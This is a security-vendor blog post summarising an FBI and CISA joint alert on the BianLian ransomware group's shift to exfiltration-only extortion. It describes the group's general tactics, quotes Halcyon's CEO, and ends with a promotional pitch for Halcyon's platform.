FBI and CISA Issue Alert on BianLian Ransomware Gang Tactical Shift


May 17, 2023

World map

The FBI and CISA have issued a joint alert regarding a confirmed shift in tactics by the BianLian ransomware gang. The report notes that BianLian, who had previously engaged in a double-extortion model where they encrypted targeted systems after exfiltrating sensitive data, but early this year shifted tactics to an exfiltration-focused data extortion strategy.

“BianLian is a ransomware developer, deployer, and data extortion cybercriminal group that has targeted organizations in multiple U.S. critical infrastructure sectors since June 2022. They have also targeted Australian critical infrastructure sectors in addition to professional services and property development,” the alert notes.  

“The group gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and exfiltrates victim data via File Transfer Protocol (FTP), Rclone, or Mega. BianLian group actors then extort money by threatening to release data if payment is not made.”

Takeaway: Ransomware is a financially motivated crime. They want the money at any cost - and if they can reduce the resources required to be successful, they will. Attackers always consider ROI in their operations. So, if ransomware groups can achieve their goals by simplifying the attack and still achieve the same results, they will.

BianLian first emerged in the wild in the summer of 2022, and successfully attacked several high-profile organizations before a free decryption tool was released to help victims recover files encrypted by ransomware.

BianLian is known to abuse Remote Desktop Protocol (RDP) for ingress, one of the more common tactics used by ransomware operators to move laterally in a compromised network. RDP exploits are also used to remotely execute malicious code like malware and attack kits, or by executing scripts in fileless attacks, or when abusing legitimate network tools in what is known as living-off-the-land. Access to RDP instances is usually accomplished by way of stolen or brute-forced user credentials.  

"Confirmation that the BianLian group has moved away from delivering ransomware payloads in favor of purely data exfiltration and extortion attacks shows how successful the double extortion strategy is for ransomware groups," Jon Miller, CEO and co-founder of Halcyon told Silicon Angle.

With data exfiltration as one of the primary tactics employed in today’s multi-stage ransomware attacks, we should really start thinking of these as data extortion attacks with some ransomware thrown into the mix sometimes, as opposed to ransomware attacks that sometimes include data exfil.

“It works so well that we will likely see more groups follow suit and forego the hassle of developing and managing the encryption and decryption process in favor of a less complicated attack," Miller told SC Magazine.

Halcyon.ai is the industry’s first dedicated, adaptive security platform that combines multiple advanced proprietary prevention engines along with AI models focused specifically on stopping ransomware – talk to a Halcyon expert today to find out more.